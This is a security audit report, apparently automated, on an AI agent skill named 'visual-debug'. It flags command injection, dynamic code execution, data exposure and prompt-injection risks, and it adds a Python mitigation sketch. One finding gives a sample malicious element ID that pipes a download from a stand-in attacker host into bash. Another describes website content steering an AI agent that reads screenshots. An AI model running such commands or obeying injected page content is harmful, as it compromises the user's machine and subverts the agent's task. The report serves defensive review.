visual-debug
Fail
Audited by Gen Agent Trust Hub on May 14, 2026
Risk Level: HIGH (COMMAND_EXECUTION, REMOTE_CODE_EXECUTION, DATA_EXFILTRATION, PROMPT_INJECTION)
Full Analysis
- [COMMAND_EXECUTION]: The scripts `scripts/section-compare.sh` and `scripts/transition-compare.sh` extract element IDs and CSS class names from analyzed web pages and use them as filenames in shell commands. These commands are executed using `subprocess.run(shell=True)` in a Python subprocess. The sanitization performed (replacing slashes and spaces) is insufficient to prevent command injection. A malicious website could use an ID like "curl attacker.com/exploit | bash" to execute arbitrary shell commands on the user's host during the screenshot capture process.
- [REMOTE_CODE_EXECUTION]: The skill frequently uses 'python3 -c' and 'node -e' to generate and execute logic on the fly via string interpolation. It also injects large blocks of JavaScript into browser sessions using `agent-browser eval`. Dynamically executing generated strings in this way significantly increases the risk of unintended code execution, especially when handling data derived from external, untrusted web sources.
- [DATA_EXFILTRATION]: As part of its core function, the skill captures screenshots, video frames, and DOM snapshots from target URLs and stores them in the local `tmp/ref/` directory. This process can inadvertently harvest sensitive data such as session tokens, personally identifiable information (PII), or private content visible on the page. While the skill includes instructions for manual cleanup, storing unencrypted sensitive data on the file system, even temporarily, creates a risk of data exposure.
- [PROMPT_INJECTION]: The mandatory visual verification workflow (Phase E) requires the LLM to inspect and compare screenshots from external sites. This creates a surface for indirect prompt injection. Malicious instructions or deceptive content rendered on the target website could influence the AI agent's decision-making or cause it to ignore its safety guidelines while it is 'reading' the implementation's visual output.
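The COMMAND_EXECUTION finding above can be illustrated with a minimal sketch of one common mitigation: reduce untrusted names to an allowlisted character set and pass them to the child process as a single argument, without a shell. This is not the skill's actual code. The names `safe_filename` and `run_capture`, the allowed character set, and the 64-character limit are all assumptions made for illustration; only the `tmp/ref` directory comes from the report.

```python
import re
import subprocess

# Assumed allowlist: anything outside letters, digits, dot, underscore, hyphen is replaced.
_UNSAFE_CHARS = re.compile(r"[^A-Za-z0-9._-]")


def safe_filename(raw_id: str, max_len: int = 64) -> str:
    """Reduce an untrusted element ID or class name to a harmless filename stem."""
    cleaned = _UNSAFE_CHARS.sub("_", raw_id)
    # Drop leading dots and hyphens so the result cannot look like "..", a
    # hidden file, or a command-line option.
    cleaned = cleaned.lstrip(".-")[:max_len]
    return cleaned or "unnamed"


def run_capture(tool_argv: list[str], raw_id: str, out_dir: str = "tmp/ref") -> subprocess.CompletedProcess:
    """Run a (hypothetical) capture tool with the output path as one argv entry."""
    out_path = f"{out_dir}/{safe_filename(raw_id)}.png"
    # List form with the default shell=False: no shell ever parses out_path,
    # so characters such as "|", ";" or "$(...)" have no special meaning.
    return subprocess.run([*tool_argv, out_path], check=True, capture_output=True, text=True)
```

With this approach, the ID quoted in the finding would become an inert filename stem rather than a pipeline. Either measure alone narrows the attack surface; combining the allowlist with the shell-free argument list means a gap in one is less likely to be exploitable.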
Recommendations
- AI detected serious security threats
Audit Metadata